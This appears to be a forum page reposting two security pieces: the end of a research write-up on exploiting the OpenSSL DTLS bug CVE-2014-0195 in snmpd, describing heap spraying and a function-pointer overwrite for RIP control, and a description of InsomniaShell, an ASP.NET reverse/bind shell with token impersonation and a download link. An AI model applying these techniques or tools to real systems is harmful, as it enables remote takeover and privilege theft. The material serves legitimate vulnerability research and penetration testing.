+0x58 of the hm_fragment structure, if we use the bug to point pitem.data to 0x401000, the parser will treat 0x401000 as a hm_fragment structure. Therefore, we will be able to write arbitrary data to 0x12345678 because it will be treated as the message buffer pointer: We now have a fairly limited exploit primitive that allows us to leverage pointers in the process address space. The next question then is, “What can we do with it?” Again, after a lot of experimentation and trying out different ideas, I think these two are pretty interesting: WriteN Primitive Instead of leveraging existing pointers in the process address space, we will fill the heap with the address that we want to write data to. This involves spraying the heap with a target address. This is done via multiple DTLS connections that each send a large handshake message containing a repeating series of the target address (0x4141414141414141 in the example below). After the heap spray, the bug is used to point pitem.data to a hard-coded heap address (0x04141414 in the example), where I think (and hope) the series of 0x4141414141414141s are potentially written, causing pitem.(hm_fragment*)data->fragment to point to 0x4141414141414141: As you may have guessed, the downside of this approach is that the hard-coded heap address is unreliable, which is true in the case of snmpd because several uncontrolled allocations will fill the heap in addition to the sprayed target address. Nonetheless, this is an interesting approach for further transforming the bug into a WriteN (write arbitrary data anywhere in the process address space) exploit primitive: Execution (RIP) Control Another approach is taking advantage of the absence of address randomization in cases where ASLR or PIE is disabled. In the case of Ubuntu, it turns out that PIE is not enabled for snmpd; this means that the snmpd executable is always mapped at a static address (0x400000): Because of this, it is possible to leverage interesting pointers stored in the snmpd executable address range and write arbitrary data to where they point at. An example of this is the stderr pointer located at 0x606FE0 in the .got section of snmpd: In turn, that pointer points somewhere in the writable .data section of libc: Looking at the data near stderr in the libc, we can see that stderr+0x18 is an interesting function pointer — which is actually a function pointer dereferenced by malloc() when requesting additional memory from the system: Therefore, for execution (RIP) control, we will use the bug to point pitem.data to 0x606F88 (0x606FE0-0x58) so that pitem.(hm_fragment*)data->fragment points to stderr in libc, causing a write to pitem.(hm_fragment*)data->fragment+0x18 with an arbitrary address. When malloc() dereferences the controlled function pointer, RIP control is achieved: Conclusion After reliably controlling RIP within the amount of time I allocated for research, I declared game over and moved on. However, that is not to say that the consequences of the bug are limited to the ones I described. A determined attacker with a lot of spare time can definitely write a complete and reliable remote exploit using the bug. Also, looking back and thinking like an attacker, converting the bug into an exploit primitive involves a lot of experimentation. It is really a creative but long and laborious process. I lost track of how many times I had to restart the service, attach to the service, explore the heap, think, try an idea, crash the service and start the process all over again. In the end, an attacker’s persistence is what transforms software bugs into working reliable exploits, and as software developers, it is good to always keep that in mind as we read and write our code, triage and fix our bugs and evaluate the use of exploit mitigations in our products. Sursa: CVE-2014-0195: Adventures in OpenSSL's DTLS Fragmented Land
-
InsomniaShell – ASP.NET Reverse Shell Or Bind Shell InsomniaShell is a tool for use during penetration tests, when you have ability to upload or create an arbitrary .aspx page. This .aspx page is an example of using native calls through pinvoke to provide either an ASP.NET reverse shell or a bind shell. ASP.NET is an open source server-side Web application framework designed for Web development to produce dynamic Web pages. It was developed by Microsoft to allow programmers to build dynamic web sites, web applications and web services. It was first released in January 2002 with version 1.0 of the .NET Framework, and is the successor to Microsoft’s Active Server Pages (ASP) technology. ASP.NET is built on the Common Language Runtime (CLR), allowing programmers to write ASP.NET code using any supported .NET language. A bind shell is basically binding the command prompt to a listening port on the compromised machine, a reverse shell is sending a command prompt to a listening port on the attackers machine (used when the hacked server doesn’t have a public IP). InsomniaShell has the added advantage of searching through all accessible processes looking for a SYSTEM or Administrator token to use for impersonation. If the provider page is running on a server with a local SQL Server instance, the shell includes functionality for a named pipe impersonation attack. This requires knowledge of the sa password, and results in the theft of the token that the SQL server is executing under. You can download InsomniaShell here: InsomniaShell.zip Sursa: InsomniaShell - ASP.NET Reverse Shell Or Bind Shell - Darknet - The Darkside